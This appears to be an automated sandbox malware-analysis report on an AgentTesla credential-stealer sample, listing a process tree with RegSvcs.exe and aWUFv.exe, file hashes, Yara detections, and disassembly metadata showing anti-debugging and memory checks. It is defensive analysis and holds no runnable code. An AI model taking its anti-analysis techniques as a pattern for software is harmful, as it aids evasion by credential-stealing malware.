                                                                      File size:1'305'263 bytes
                                                                      MD5 hash:AA6F514A7AFA81E26BCF612923EA483C
                                                                      Has elevated privileges:false
                                                                      Has administrator privileges:false
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:low
                                                                      Has exited:true

                                                                      General

                                                                      Target ID:12
                                                                      Start time:04:39:43
                                                                      Start date:27/09/2024
                                                                      Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:"C:\Users\user\AppData\Local\unspattered\recomplaint.exe"
                                                                      Imagebase:0x680000
                                                                      File size:45'984 bytes
                                                                      MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                                                                      Has elevated privileges:false
                                                                      Has administrator privileges:false
                                                                      Programmed in:C, C++ or other language
                                                                      Yara matches:
                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000C.00000002.3370850966.0000000002944000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000C.00000002.3370850966.0000000002944000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000C.00000002.3370850966.0000000002989000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                      Reputation:high
                                                                      Has exited:false

                                                                      General

                                                                      Target ID:13
                                                                      Start time:04:39:50
                                                                      Start date:27/09/2024
                                                                      Path:C:\Users\user\AppData\Roaming\aWUFv\aWUFv.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:"C:\Users\user\AppData\Roaming\aWUFv\aWUFv.exe"
                                                                      Imagebase:0x500000
                                                                      File size:45'984 bytes
                                                                      MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                                                                      Has elevated privileges:false
                                                                      Has administrator privileges:false
                                                                      Programmed in:C, C++ or other language
                                                                      Antivirus matches:
                                                                      • Detection: 0%, ReversingLabs
                                                                      Reputation:high
                                                                      Has exited:true

                                                                      General

                                                                      Target ID:14
                                                                      Start time:04:39:50
                                                                      Start date:27/09/2024
                                                                      Path:C:\Windows\System32\conhost.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                      Imagebase:0x7ff66e660000
                                                                      File size:862'208 bytes
                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                      Has elevated privileges:false
                                                                      Has administrator privileges:false
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high
                                                                      Has exited:true

                                                                      General

                                                                      Target ID:15
                                                                      Start time:04:39:58
                                                                      Start date:27/09/2024
                                                                      Path:C:\Users\user\AppData\Roaming\aWUFv\aWUFv.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:"C:\Users\user\AppData\Roaming\aWUFv\aWUFv.exe"
                                                                      Imagebase:0x590000
                                                                      File size:45'984 bytes
                                                                      MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                                                                      Has elevated privileges:false
                                                                      Has administrator privileges:false
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high
                                                                      Has exited:true

                                                                      General

                                                                      Target ID:16
                                                                      Start time:04:39:58
                                                                      Start date:27/09/2024
                                                                      Path:C:\Windows\System32\conhost.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                      Imagebase:0x7ff66e660000
                                                                      File size:862'208 bytes
                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                      Has elevated privileges:false
                                                                      Has administrator privileges:false
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high
                                                                      Has exited:true

                                                                      Disassembly

                                                                      Reset < >

                                                                        Executed Functions

                                                                        Function 00007FFD34773678 Relevance: .1, Instructions: 57COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2300598863.00007FFD34770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34770000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ffd34770000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 6f33d1e632989635678b245328cc7bc1721c8c077b4203030e450c6231414e73
                                                                        • Instruction ID: b660c7a411bc3914f106ca2a174f464b8a8971992e48fa8ce72d43bb11ef9079
                                                                        • Opcode Fuzzy Hash: 6f33d1e632989635678b245328cc7bc1721c8c077b4203030e450c6231414e73
                                                                        • Instruction Fuzzy Hash: 2311C47150D7C54FE746DB28A8A55A4BFB0EF53230B1401DFD1C5CB1A3D12AA88AC742
                                                                        Function 00007FFD34773605 Relevance: .0, Instructions: 49COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2300598863.00007FFD34770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34770000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ffd34770000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                                                                        • Instruction ID: 281100a30d7c8aacf98cc0b2a1d9629b209f2f8b3be5d8b47f005ab220b1047f
                                                                        • Opcode Fuzzy Hash: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                                                                        • Instruction Fuzzy Hash: E101677121CB0C8FD744EF0CE491AB9B7E0FB95364F50056DE58AC3651D636E881CB45

                                                                        Execution Graph

                                                                        Execution Coverage:13.5%
                                                                        Dynamic/Decrypted Code Coverage:100%
                                                                        Signature Coverage:12.9%
                                                                        Total number of Nodes:31
                                                                        Total number of Limit Nodes:4
                                                                        execution_graph 25771 1670848 25773 167084e 25771->25773 25772 167091b 25773->25772 25775 1671488 25773->25775 25778 167149e 25775->25778 25776 16715be 25776->25773 25778->25776 25781 1677ed0 25778->25781 25785 1677ea8 25778->25785 25789 1679128 25778->25789 25782 1677ed5 25781->25782 25783 1677eeb 25782->25783 25794 16780a8 25782->25794 25783->25778 25786 1677ed0 25785->25786 25787 1677eeb 25786->25787 25788 16780a8 CheckRemoteDebuggerPresent 25786->25788 25787->25778 25788->25787 25790 1679132 25789->25790 25791 167914c 25790->25791 25798 6e5f5c8 25790->25798 25802 6e5f5d8 25790->25802 25791->25778 25795 167804f CheckRemoteDebuggerPresent 25794->25795 25797 16780b2 25794->25797 25796 167805e 25795->25796 25796->25783 25797->25783 25800 6e5f5d8 25798->25800 25799 6e5f802 25799->25791 25800->25799 25801 6e5fc20 GlobalMemoryStatusEx GlobalMemoryStatusEx 25800->25801 25801->25800 25804 6e5f5ed 25802->25804 25803 6e5f802 25803->25791 25804->25803 25805 6e5fc20 GlobalMemoryStatusEx GlobalMemoryStatusEx 25804->25805 25805->25804 25806 1678b48 25807 1678b8e DeleteFileW 25806->25807 25809 1678bc7 25807->25809

                                                                        Executed Functions

                                                                        Function 0167BC10 Relevance: 3.1, Instructions: 3132COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.2566369542.0000000001670000.00000040.00000800.00020000.00000000.sdmp, Offset: 01670000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_1670000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: d6ac5f72f46b05cf1dfb870b3e766505e58c39a6f8e6563686ad28d9e56c9719
                                                                        • Instruction ID: 7cedeba80cf63c7c4230623099e0889257321527014ce26b0cd3a7e602527095
                                                                        • Opcode Fuzzy Hash: d6ac5f72f46b05cf1dfb870b3e766505e58c39a6f8e6563686ad28d9e56c9719
                                                                        • Instruction Fuzzy Hash: DC630C31D10B1A8ADB11EF68C8905A9F7B1FF99300F15D79AE45877221FB70AAC5CB81
                                                                        Function 06E55150 Relevance: 1.8, Strings: 1, Instructions: 591COMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 538 6e55150-6e5516d 539 6e5516f-6e55172 538->539 540 6e55174-6e55175 539->540 541 6e5517a-6e5517d 539->541 540->541 542 6e55194-6e55197 541->542 543 6e5517f-6e5518f 541->543 544 6e55285-6e5528e 542->544 545 6e5519d-6e551a0 542->545 543->542 549 6e55290 544->549 550 6e552d3-6e552dc 544->550 547 6e551c4-6e551c7 545->547 548 6e551a2-6e551bf 545->548 551 6e551e3-6e551e6 547->551 552 6e551c9-6e551de 547->552 548->547 555 6e55295-6e55298 549->555 553 6e55326-6e55353 550->553 554 6e552de-6e552e9 550->554 556 6e551fc-6e551ff 551->556 557 6e551e8-6e551f7 551->557 552->551 577 6e5535d-6e55360 553->577 554->553 558 6e552eb-6e552fb 554->558 560 6e552a2-6e552a5 555->560 561 6e5529a-6e5529d 555->561 566 6e55201-6e55204 556->566 567 6e5520b-6e5520e 556->567 557->556 558->553 568 6e552fd-6e55301 558->568 562 6e552a7-6e552ac 560->562 563 6e552af-6e552b2 560->563 561->560 562->563 569 6e552b4-6e552bd 563->569 570 6e552be-6e552c1 563->570 572 6e55206 566->572 573 6e55238-6e55246 566->573 567->566 574 6e55210-6e55213 567->574 575 6e55306-6e55308 568->575 578 6e552c3-6e552c7 570->578 579 6e552ce-6e552d1 570->579 572->567 584 6e5524d-6e55250 573->584 580 6e55215-6e5521b 574->580 581 6e55226-6e55229 574->581 582 6e5530f-6e55312 575->582 583 6e5530a 575->583 585 6e55374-6e55377 577->585 586 6e55362-6e55369 577->586 587 6e552c9 578->587 588 6e55318-6e55325 578->588 579->550 579->575 580->540 589 6e55221 580->589 590 6e55233-6e55236 581->590 591 6e5522b-6e55230 581->591 582->539 582->588 583->582 592 6e55255-6e55258 584->592 595 6e55379-6e55383 585->595 596 6e55388-6e5538b 585->596 593 6e55442-6e55449 586->593 594 6e5536f 586->594 587->579 589->581 590->573 590->592 591->590 597 6e55270-6e55273 592->597 598 6e5525a-6e5526b 592->598 594->585 595->596 599 6e55395-6e55398 596->599 600 6e5538d-6e55394 596->600 601 6e55275-6e5527b 597->601 602 6e55280-6e55283 597->602 598->597 604 6e553ba-6e553bd 599->604 605 6e5539a-6e5539e 599->605 601->602 602->544 602->555 606 6e553bf-6e553c3 604->606 607 6e553db-6e553de 604->607 609 6e553a4-6e553ac 605->609 610 6e5544a-6e55484 605->610 606->610 611 6e553c9-6e553d1 606->611 612 6e553f6-6e553f9 607->612 613 6e553e0-6e553f1 607->613 609->610 614 6e553b2-6e553b5 609->614 620 6e55486-6e55489 610->620 611->610 615 6e553d3-6e553d6 611->615 617 6e55413-6e55416 612->617 618 6e553fb-6e553ff 612->618 613->612 614->604 615->607 622 6e55430-6e55432 617->622 623 6e55418-6e5541c 617->623 618->610 621 6e55401-6e55409 618->621 626 6e554a1-6e554a4 620->626 627 6e5548b-6e5549e 620->627 621->610 628 6e5540b-6e5540e 621->628 624 6e55434 622->624 625 6e55439-6e5543c 622->625 623->610 629 6e5541e-6e55426 623->629 624->625 625->577 625->593 630 6e554a6-6e554b7 626->630 631 6e554be-6e554c1 626->631 628->617 629->610 632 6e55428-6e5542b 629->632 642 6e55507-6e5550e 630->642 643 6e554b9 630->643 633 6e554c3-6e554d4 631->633 634 6e554db-6e554de 631->634 632->622 633->627 644 6e554d6 633->644 636 6e554e0-6e554f1 634->636 637 6e554f8-6e554fb 634->637 648 6e554f3 636->648 649 6e55518-6e55529 636->649 640 6e55574-6e55708 637->640 641 6e554fd-6e55500 637->641 687 6e5583e-6e55851 640->687 688 6e5570e-6e55715 640->688 641->640 646 6e55502-6e55505 641->646 647 6e55513-6e55516 642->647 643->631 644->634 646->642 646->647 647->649 651 6e55530-6e55533 647->651 648->637 649->642 658 6e5552b 649->658 652 6e55535-6e5553c 651->652 653 6e55541-6e55544 651->653 652->653 656 6e55546-6e55557 653->656 657 6e5555e-6e55561 653->657 656->642 664 6e55559 656->664 659 6e55563-6e55568 657->659 660 6e5556b-6e5556e 657->660 658->651 659->660 660->640 663 6e55854-6e55856 660->663 665 6e5585d-6e55860 663->665 666 6e55858 663->666 664->657 665->620 668 6e55866-6e5586f 665->668 666->665 689 6e557c9-6e557d0 688->689 690 6e5571b-6e5574e 688->690 689->687 692 6e557d2-6e55805 689->692 700 6e55750 690->700 701 6e55753-6e55794 690->701 703 6e55807 692->703 704 6e5580a-6e55837 692->704 700->701 712 6e55796-6e557a7 701->712 713 6e557ac-6e557b3 701->713 703->704 704->668 704->687 712->668 716 6e557b5 call 6e55877 713->716 717 6e557b5 call 6e55b80 713->717 715 6e557bb-6e557bd 715->668 716->715 717->715
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.2581553985.0000000006E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E50000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_6e50000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: $
                                                                        • API String ID: 0-3993045852
                                                                        • Opcode ID: 88cdc8a85157f21eac9392a46fc6a5953ebdc8b22d1a839614fa98c1517ad7ba
                                                                        • Instruction ID: cffa37539bd36f0a568feb367aa2099bbf2f913195a2c7f226f57d126b7d06f9
                                                                        • Opcode Fuzzy Hash: 88cdc8a85157f21eac9392a46fc6a5953ebdc8b22d1a839614fa98c1517ad7ba
                                                                        • Instruction Fuzzy Hash: 5222B035E003158FDF64DBA8C5846AEBBB2FF89314F258469D806EB354DA35EC46CB90
                                                                        Function 016780A8 Relevance: 1.6, APIs: 1, Instructions: 79COMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 718 16780a8-16780b0 719 16780b2-16780cd 718->719 720 167804f-167805c CheckRemoteDebuggerPresent 718->720 721 16780cf-16780d2 719->721 722 1678065-16780a0 720->722 723 167805e-1678064 720->723 724 16780d4-16780ef call 1677964 call 1677974 721->724 725 1678121-1678123 721->725 723->722 733 16780f4-1678131 724->733 725->721 727 1678125-167812a 725->727 727->721
                                                                        APIs
                                                                        • CheckRemoteDebuggerPresent.KERNEL32(?,?), ref: 0167804F
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.2566369542.0000000001670000.00000040.00000800.00020000.00000000.sdmp, Offset: 01670000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_1670000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID: CheckDebuggerPresentRemote
                                                                        • String ID:
                                                                        • API String ID: 3662101638-0
                                                                        • Opcode ID: e23c2f61c7fd8ad678381aca5f1cd0c7ae00323ede40b41f6efd8cdaa0ec514e
                                                                        • Instruction ID: b39c6b7746ef7b20f74d4b5312f50609bc1ffcb6af4526fb1db2ff451f4078f6
                                                                        • Opcode Fuzzy Hash: e23c2f61c7fd8ad678381aca5f1cd0c7ae00323ede40b41f6efd8cdaa0ec514e
                                                                        • Instruction Fuzzy Hash: 5D21F632A002559FDF01DFB99C483FEBBE5EF45220F1484A9D685D7242E7388A46CB92
                                                                        Function 06E56188 Relevance: .8, Instructions: 810COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.2581553985.0000000006E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E50000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_6e50000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 29a640267d11ca9f0c650c2450ff35c7939d4da5756f1d85050b0d3333456a60
                                                                        • Instruction ID: 329ac67169d6a29d78304f63af0d92c93c7188bac88f60591156d45b2c8c9fb9
                                                                        • Opcode Fuzzy Hash: 29a640267d11ca9f0c650c2450ff35c7939d4da5756f1d85050b0d3333456a60
                                                                        • Instruction Fuzzy Hash: 35629C34B002058FEB54DB68D584AADB7F2EF88318F559569E806DB3A1DB35EC46CB80
                                                                        Function 06E5C130 Relevance: .6, Instructions: 635COMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 2891 6e5c130-6e5c152 2892 6e5c154-6e5c157 2891->2892 2893 6e5c176-6e5c179 2892->2893 2894 6e5c159-6e5c171 2892->2894 2895 6e5c183-6e5c186 2893->2895 2896 6e5c17b-6e5c17e 2893->2896 2894->2893 2897 6e5c1a9-6e5c1ac 2895->2897 2898 6e5c188-6e5c1a4 2895->2898 2896->2895 2900 6e5c1be-6e5c1c1 2897->2900 2901 6e5c1ae-6e5c1b7 2897->2901 2898->2897 2903 6e5c1c3-6e5c1cc 2900->2903 2905 6e5c1de-6e5c1e1 2900->2905 2901->2903 2904 6e5c1b9 2901->2904 2906 6e5c4d2-6e5c505 2903->2906 2907 6e5c1d2-6e5c1d9 2903->2907 2904->2900 2905->2901 2908 6e5c1e3-6e5c1e6 2905->2908 2917 6e5c507-6e5c50a 2906->2917 2907->2905 2909 6e5c1f0-6e5c1f3 2908->2909 2910 6e5c1e8-6e5c1eb 2908->2910 2912 6e5c1f5-6e5c1f8 2909->2912 2913 6e5c1fd-6e5c200 2909->2913 2910->2909 2912->2913 2915 6e5c220-6e5c223 2913->2915 2916 6e5c202-6e5c21b 2913->2916 2918 6e5c225-6e5c22b 2915->2918 2919 6e5c230-6e5c233 2915->2919 2916->2915 2920 6e5c536-6e5c539 2917->2920 2921 6e5c50c-6e5c525 2917->2921 2918->2919 2925 6e5c235-6e5c257 2919->2925 2926 6e5c25c-6e5c25f 2919->2926 2922 6e5c559-6e5c55c 2920->2922 2923 6e5c53b-6e5c554 2920->2923 2945 6e5c5bf-6e5c5cb 2921->2945 2946 6e5c52b-6e5c535 2921->2946 2929 6e5c55e-6e5c568 2922->2929 2930 6e5c569-6e5c56c 2922->2930 2923->2922 2925->2926 2927 6e5c276-6e5c279 2926->2927 2928 6e5c261-6e5c271 2926->2928 2933 6e5c473-6e5c47c 2927->2933 2934 6e5c27f-6e5c282 2927->2934 2928->2927 2935 6e5c58f-6e5c592 2930->2935 2936 6e5c56e-6e5c58a 2930->2936 2940 6e5c284-6e5c28d 2933->2940 2941 6e5c482 2933->2941 2934->2940 2943 6e5c29c-6e5c29f 2934->2943 2938 6e5c594-6e5c5a2 2935->2938 2939 6e5c5ad-6e5c5af 2935->2939 2936->2935 2938->2921 2964 6e5c5a8 2938->2964 2948 6e5c5b6-6e5c5b9 2939->2948 2949 6e5c5b1 2939->2949 2940->2906 2951 6e5c293-6e5c297 2940->2951 2947 6e5c487-6e5c48a 2941->2947 2952 6e5c2a1-6e5c2c6 2943->2952 2953 6e5c2cb-6e5c2ce 2943->2953 2961 6e5c5d1-6e5c5da 2945->2961 2962 6e5c76b-6e5c775 2945->2962 2959 6e5c4b5-6e5c4b7 2947->2959 2960 6e5c48c-6e5c4b0 2947->2960 2948->2917 2948->2945 2949->2948 2951->2943 2952->2953 2957 6e5c2d0-6e5c2d4 2953->2957 2958 6e5c2df-6e5c2e2 2953->2958 2957->2896 2965 6e5c2da 2957->2965 2966 6e5c2e4-6e5c2fd 2958->2966 2967 6e5c302-6e5c305 2958->2967 2970 6e5c4be-6e5c4c1 2959->2970 2971 6e5c4b9 2959->2971 2960->2959 2968 6e5c776-6e5c7ae 2961->2968 2969 6e5c5e0-6e5c600 2961->2969 2964->2939 2965->2958 2966->2967 2975 6e5c325-6e5c328 2967->2975 2976 6e5c307-6e5c320 2967->2976 2988 6e5c7b0-6e5c7b3 2968->2988 3000 6e5c606-6e5c60f 2969->3000 3001 6e5c759-6e5c765 2969->3001 2970->2892 2977 6e5c4c7-6e5c4d1 2970->2977 2971->2970 2980 6e5c354-6e5c357 2975->2980 2981 6e5c32a-6e5c34f 2975->2981 2976->2975 2984 6e5c382-6e5c385 2980->2984 2985 6e5c359-6e5c37d 2980->2985 2981->2980 2992 6e5c387-6e5c38c 2984->2992 2993 6e5c38f-6e5c392 2984->2993 2985->2984 2990 6e5c7b5-6e5c7d1 2988->2990 2991 6e5c7d6-6e5c7d9 2988->2991 2990->2991 2997 6e5c993-6e5c995 2991->2997 2998 6e5c7df-6e5c7ed 2991->2998 2992->2993 3002 6e5c3a4-6e5c3a7 2993->3002 3003 6e5c394-6e5c39f 2993->3003 3008 6e5c997 2997->3008 3009 6e5c99c-6e5c99f 2997->3009 3016 6e5c7f4-6e5c7f6 2998->3016 3000->2968 3010 6e5c615-6e5c644 call 6e56138 3000->3010 3001->2961 3001->2962 3005 6e5c3c3-6e5c3c6 3002->3005 3006 6e5c3a9-6e5c3b8 3002->3006 3003->3002 3012 6e5c3de-6e5c3e1 3005->3012 3013 6e5c3c8-6e5c3d9 3005->3013 3006->2910 3026 6e5c3be 3006->3026 3008->3009 3009->2988 3014 6e5c9a5-6e5c9ae 3009->3014 3039 6e5c686-6e5c69c 3010->3039 3040 6e5c646-6e5c67e 3010->3040 3023 6e5c3e3-6e5c3e8 3012->3023 3024 6e5c3eb-6e5c3ee 3012->3024 3013->3012 3021 6e5c80d-6e5c837 3016->3021 3022 6e5c7f8-6e5c7fb 3016->3022 3041 6e5c83d-6e5c846 3021->3041 3042 6e5c988-6e5c992 3021->3042 3022->3014 3023->3024 3029 6e5c3f0-6e5c459 3024->3029 3030 6e5c45e-6e5c461 3024->3030 3026->3005 3029->3030 3033 6e5c463-6e5c469 3030->3033 3034 6e5c46e-6e5c471 3030->3034 3033->3034 3034->2933 3034->2947 3048 6e5c69e-6e5c6b2 3039->3048 3049 6e5c6ba-6e5c6d0 3039->3049 3040->3039 3043 6e5c961-6e5c986 3041->3043 3044 6e5c84c-6e5c959 call 6e56138 3041->3044 3043->3014 3044->3041 3098 6e5c95f 3044->3098 3048->3049 3058 6e5c6d2-6e5c6e6 3049->3058 3059 6e5c6ee-6e5c701 3049->3059 3058->3059 3069 6e5c703-6e5c70d 3059->3069 3070 6e5c70f 3059->3070 3071 6e5c714-6e5c716 3069->3071 3070->3071 3073 6e5c747-6e5c753 3071->3073 3074 6e5c718-6e5c71d 3071->3074 3073->3000 3073->3001 3076 6e5c71f-6e5c729 3074->3076 3077 6e5c72b 3074->3077 3078 6e5c730-6e5c732 3076->3078 3077->3078 3078->3073 3080 6e5c734-6e5c740 3078->3080 3080->3073 3098->3042
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.2581553985.0000000006E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E50000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_6e50000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: c6d738129aa19cd7d7e959a1b986b191025a69bb05764729c4c5cc1eebd6ab00
                                                                        • Instruction ID: 0337ad684c0647063064549b2c65c508fdbab3c234233068ab712ea8773c1ea2
                                                                        • Opcode Fuzzy Hash: c6d738129aa19cd7d7e959a1b986b191025a69bb05764729c4c5cc1eebd6ab00
                                                                        • Instruction Fuzzy Hash: 1D329F74B103098FDB50DB68D894BADB7B6EF88714F219529DA05EB381DB34EC468F90
                                                                        Function 06E5B1C9 Relevance: .6, Instructions: 563COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.2581553985.0000000006E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E50000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_6e50000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: d074fdabe5cb80a67c966375a14c9c315db42b3c6e0427983f1272ff3db4b0c3
                                                                        • Instruction ID: 452fe1c72634750d17f588387735cb7c9a5efd420f48a2c30f3c49bc722a6fa3
                                                                        • Opcode Fuzzy Hash: d074fdabe5cb80a67c966375a14c9c315db42b3c6e0427983f1272ff3db4b0c3
                                                                        • Instruction Fuzzy Hash: 5A227334E103098FEF64DB68C4A47AEB7B6FB49314F219526E845EB391DA34DC81CB91
                                                                        Function 06E53018 Relevance: .5, Instructions: 545COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.2581553985.0000000006E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E50000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_6e50000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 1a270aaf4547c66c1a0cee23e040a39252aace79f494c192fcb606bbc30d2b63
                                                                        • Instruction ID: 9ffdd89e5f272e54a246db5e1640974cec6ebdcac4f509d70dc207824658fea4
                                                                        • Opcode Fuzzy Hash: 1a270aaf4547c66c1a0cee23e040a39252aace79f494c192fcb606bbc30d2b63
                                                                        • Instruction Fuzzy Hash: 98322E31E1075ACFDB14DF74C85499DB7B6FF89300F2196AAD809A7265EB30AD85CB80
                                                                        Function 06E57918 Relevance: .5, Instructions: 472COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.2581553985.0000000006E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E50000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_6e50000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 6df537dcf0a673501989b2f2ed17ab458fd5024f40646c44cc5a78d2d2c69620
                                                                        • Instruction ID: 2c8dd4bedcc8c1b4a2fbb01638b901f58a1bf32e360e1d3e52bff10f00b930ef
                                                                        • Opcode Fuzzy Hash: 6df537dcf0a673501989b2f2ed17ab458fd5024f40646c44cc5a78d2d2c69620
                                                                        • Instruction Fuzzy Hash: 58029F30B003068FEF54DF68D894AAEB7A2FF84314F259569D9069B354EB35EC52CB90
                                                                        Function 06E55877 Relevance: .4, Instructions: 414COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.2581553985.0000000006E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E50000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_6e50000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 2b489fac14abe0ce369de41d99c89011d6f1ac0ab3732238b135315036d61e5a
                                                                        • Instruction ID: 59a97e1c032cba1a1d0cc125abc3ce8905f419e2bc99389cfd5ee43d2f41357d
                                                                        • Opcode Fuzzy Hash: 2b489fac14abe0ce369de41d99c89011d6f1ac0ab3732238b135315036d61e5a
                                                                        • Instruction Fuzzy Hash: F2E11731B102148FDF54DB68D494AAEBBF2FF89324F26846AD846DB365CA31DC05CB91
                                                                        Function 0167F268 Relevance: .3, Instructions: 331COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.2566369542.0000000001670000.00000040.00000800.00020000.00000000.sdmp, Offset: 01670000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_1670000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 5e6b243234c9e782cfab638b04ee607a79899b6d5572d1cd10b5f3cc83c558f3
                                                                        • Instruction ID: 9addc1bccd4432cfd6f920f016f9b073414ce0556861c2742f1fbe5c8f38bf01
                                                                        • Opcode Fuzzy Hash: 5e6b243234c9e782cfab638b04ee607a79899b6d5572d1cd10b5f3cc83c558f3
                                                                        • Instruction Fuzzy Hash: EBB1C674B002598BEB58AF79985467E7BE7BFC8700B1584ADE447D7388CE34DC028B96
                                                                        Function 01674BD8 Relevance: .3, Instructions: 266COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.2566369542.0000000001670000.00000040.00000800.00020000.00000000.sdmp, Offset: 01670000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_1670000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 240b8a9580fdd41cceb499e285c616ccb5a9e3f8760377016ee32e062671bf82
                                                                        • Instruction ID: 97be561380430758aca39c7ca0336f9539e2ffaf63cea0411efe56132ec80646
                                                                        • Opcode Fuzzy Hash: 240b8a9580fdd41cceb499e285c616ccb5a9e3f8760377016ee32e062671bf82
                                                                        • Instruction Fuzzy Hash: 26B13D71E00209CFDB14CFA9DC897ADBBF2AF88714F148529D815AB354EB749845CB81
                                                                        Function 01673FC0 Relevance: .2, Instructions: 238COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.2566369542.0000000001670000.00000040.00000800.00020000.00000000.sdmp, Offset: 01670000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_1670000_RegSvcs.jbxd
